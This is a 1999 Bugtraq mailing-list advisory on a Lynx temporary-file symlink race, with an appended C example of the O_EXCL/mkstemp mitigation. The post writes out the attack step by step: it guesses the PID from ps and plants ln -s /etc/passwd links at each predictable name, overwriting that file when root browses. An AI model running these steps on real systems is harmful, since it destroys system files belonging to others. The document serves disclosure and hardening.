Bugtraq mailing list archives
Lynx /tmp problem
From: diego () HERCULES UNIVALLE EDU CO (Juan Diego Bolanos)
Date: Tue, 9 Feb 1999 20:57:30 -0500
Hi Aleph, please filter this if already posted....

------

Hello....

I have found a bug in Lynx, all versions except the latest stable release...

Lynx creates temporary files in /tmp in this way....

    L[num proc]-xTMP.html

where [num proc] is the proc number in the machine and x is a number from 0 to 9.

If I run Lynx as any user, for example root, we see this:

    earthworm:~$ ps
      PID TTY STAT  TIME COMMAND
       91   1 SW    0:06 (bash)
       94   4 S     0:05 -bash
       95   5 SW    0:06 (bash)
     3867  a3 S     0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
     3870   3 SW    0:02 (ssh)
     3894   4 T     0:00 lynx
     3898   4 R     0:00 ps

Then the files in /tmp created by Lynx will be..

    L3894-0TMP.html
    L3894-1TMP.html
    L3894-2TMP.html
    L3894-3TMP.html
    L3894-4TMP.html
    L3894-5TMP.html
    L3894-6TMP.html
    L3894-7TMP.html
    L3894-8TMP.html
    L3894-9TMP.html

If I make a symlink from all of these files to any file in the system, for example....

    earthworm:~$ cd /tmp
    earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
    earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the backspace key to reach the history list, the file I have linked (in this case /etc/passwd) will be replaced with it... and it is now owned by root...

For example, I got this on my system...

    earthworm:/tmp$ cat /etc/passwd
    <head>
    <title>Lynx History Page</title>
    </head>
    <body>
    <h1>You have reached the History Page</h1>
    <h2>Lynx Version 2.8rel2</h2>
    <pre><em>You selected:</em>
    <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
    <tab to=t0>file://localhost/root/firefaq.html
    </pre>
    </body>

As you see, the file is lost now...

This bug is Lynx-specific, so all OSes are vulnerable..

Fix: upgrade to the latest Lynx version. I have checked it, and it appears to use L[proc num]-xTMP.html where x is from 0 to ???... I hope it is already fixed; creating 100 symlinks is not too hard :)

The Lynx team knows about this already.

by... Juan Diego
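
Added example, not part of the original post and not Lynx's own code: a C sketch of the mitigation for the symlink problem described above, creating the temporary file exclusively so a pre-planted link is refused, or letting mkstemp() choose an unpredictable name. The function names, the "victim" file and the scratch directory are assumptions made for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern from the post, L<pid>-<n>TMP.html: guessable from `ps`. */
static void predictable_name(char *buf, size_t len, const char *dir, int n) {
    snprintf(buf, len, "%s/L%ld-%dTMP.html", dir, (long)getpid(), n);
}

/* Fixed name, hardened: O_EXCL makes open() fail with EEXIST when anything,
 * a symlink included, already sits at `path`, so no link is followed. */
int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Preferred: mkstemp() picks a random name and creates it exclusively. */
int open_unpredictable(const char *dir, char *out, size_t len) {
    snprintf(out, len, "%s/LXXXXXX", dir);
    return mkstemp(out);
}

/* Constructed scenario in a private scratch directory: a symlink is planted
 * at the predictable name before the history page is written.
 * Returns 0 when the link target is left untouched by both hardened paths. */
int symlink_scenario(void) {
    char dir[] = "/tmp/lynxdemoXXXXXX", victim[128], name[128], fresh[128];
    const char page[] = "<title>Lynx History Page</title>\n";
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("keep me\n", f);                     /* 8 bytes that must survive */
    fclose(f);
    predictable_name(name, sizeof name, dir, 0);
    if (symlink(victim, name) != 0) return -1;
    /* fopen(name, "w") here would follow the link and truncate `victim`. */
    if (open_exclusive(name) != -1) return 1;  /* must refuse the planted link */
    int fd = open_unpredictable(dir, fresh, sizeof fresh);
    if (fd < 0 || write(fd, page, sizeof page - 1) < 0) return 2;
    close(fd);
    int ok = stat(victim, &st) == 0 && st.st_size == 8;
    unlink(fresh); unlink(name); unlink(victim); rmdir(dir);
    return ok ? 0 : 3;
}
int main(void) { return symlink_scenario(); }
```

Widening the counter range, as the post observes, only raises the number of links needed; exclusive creation removes the race regardless of how guessable the name is.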